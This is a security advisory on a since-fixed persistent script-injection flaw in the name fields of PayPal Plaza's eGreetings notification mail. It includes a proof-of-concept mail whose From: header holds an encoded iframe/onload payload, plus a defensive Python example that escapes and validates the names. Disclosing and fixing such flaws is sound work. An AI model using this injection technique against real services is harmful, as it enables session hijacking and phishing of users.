The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official PayPal Plaza website application.
The bug allows a remote attacker to inject malicious script code persistently on the application side of the PayPal Plaza eGreetings web service. The vulnerability is located in the notification mail sent by the eGreeting module (Step 5, Preview), through the vulnerable "your name" and "recipient's name" parameters, which are bound into the mail without sanitisation.
The vulnerability can be exploited by remote attackers with low or medium required user interaction and without a privileged Customer/Pro/Seller account. Successful exploitation can lead to session hijacking of customers, account theft via persistent web attacks, persistent phishing, or stable (persistent) manipulation of the mail notification context.
Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by remote attackers with low or medium required user interaction.
For demonstration or to reproduce ...
Review: Notification Mail - eGreetings Card Notification
<html>
<head>
<title>You have received a eCard from your loved one.</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
You have received a eCard from your loved one.</td></tr><tr><td><b>Von: </b>=?utf-8?B?Ij48aWZyYW1lIHNyYz1hIG9ubG9hZD1hbGVydCgiSEkiKSA8?=
<admin@vulnerability-lab.com></td></tr><tr><td><b>Datum: </b>14.08.2012 05:15</td></tr></table><table border=0 cellspacing=0
cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>research@vulnerability-lab.com</td></tr></table><br>
Dear "><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") <,<br/><br/>
Greetings! "><"><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") < has just sent you a eCard.
<br/><br/>
<a href="https://www.paypal-plaza.com/giftcard/2494/lang/en_au">View your eCard now.</a>
</body>
</html>
The security risk of the persistent input validation vulnerability in the mail notification service filter is estimated as medium. PayPal has since fixed the vulnerability.
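As an added illustration (constructed for this advisory; it is neither PayPal's code nor the Vulnerability Lab's), the following Python shows the defect class behind the notification mail above and how a mail generator avoids it: the name fields are HTML-encoded before they land in the body, the display name in the From: header is built through the email library so it is encoded rather than spliced in raw, and an assumed allow-list rejects names containing markup characters before any mail is built. The template strings mirror the body quoted above; all names and addresses are sample values.

```python
"""Safe rendering of an eCard notification mail (constructed example)."""
import html
import re
from email.message import EmailMessage
from email.headerregistry import Address

# Assumed allow-list policy for the two injectable fields ("your name",
# "recipient's name"): letters, digits, space, dot, apostrophe, hyphen.
NAME_RE = re.compile(r"[A-Za-z0-9 .'\-]{1,64}")


def render_body_unsafe(sender_name: str, recipient_name: str) -> str:
    """Mirrors the vulnerable behaviour: names are placed in HTML unescaped,
    so '"><' sequences in a name break out of the template."""
    return (f"Dear {recipient_name},<br/><br/>"
            f"Greetings! {sender_name} has just sent you an eCard.")


def render_body_safe(sender_name: str, recipient_name: str) -> str:
    """Hardened variant: HTML-encode both fields so markup renders as text."""
    return (f"Dear {html.escape(recipient_name, quote=True)},<br/><br/>"
            f"Greetings! {html.escape(sender_name, quote=True)} "
            f"has just sent you an eCard.")


def is_valid_name(value: str) -> bool:
    """Server-side allow-list check; rejects quotes, angle brackets, etc."""
    return NAME_RE.fullmatch(value) is not None


def build_notification(sender_name: str, recipient_name: str,
                       recipient_addr: str,
                       from_addr: str = "noreply@example.invalid") -> EmailMessage:
    """Assemble the notification. Address() encodes the display name as a
    proper header phrase (RFC 2047 encoded-word when needed), so a name
    cannot inject into the From: line the way the advisory's sample does."""
    if not (is_valid_name(sender_name) and is_valid_name(recipient_name)):
        raise ValueError("name contains characters outside the allow-list")
    msg = EmailMessage()
    msg["Subject"] = "You have received an eCard from your loved one."
    msg["From"] = Address(display_name=sender_name, addr_spec=from_addr)
    msg["To"] = recipient_addr
    msg.set_content(render_body_safe(sender_name, recipient_name), subtype="html")
    return msg


if __name__ == "__main__":
    sample = '"><b>x</b>'  # constructed markup-bearing name, not a payload
    print(render_body_unsafe(sample, "Bob"))  # markup survives
    print(render_body_safe(sample, "Bob"))    # markup is encoded
    print(build_notification("Alice", "Bob", "bob@example.invalid"))
```

Running the block prints the unescaped and escaped bodies side by side, then the full safe message with its encoded headers.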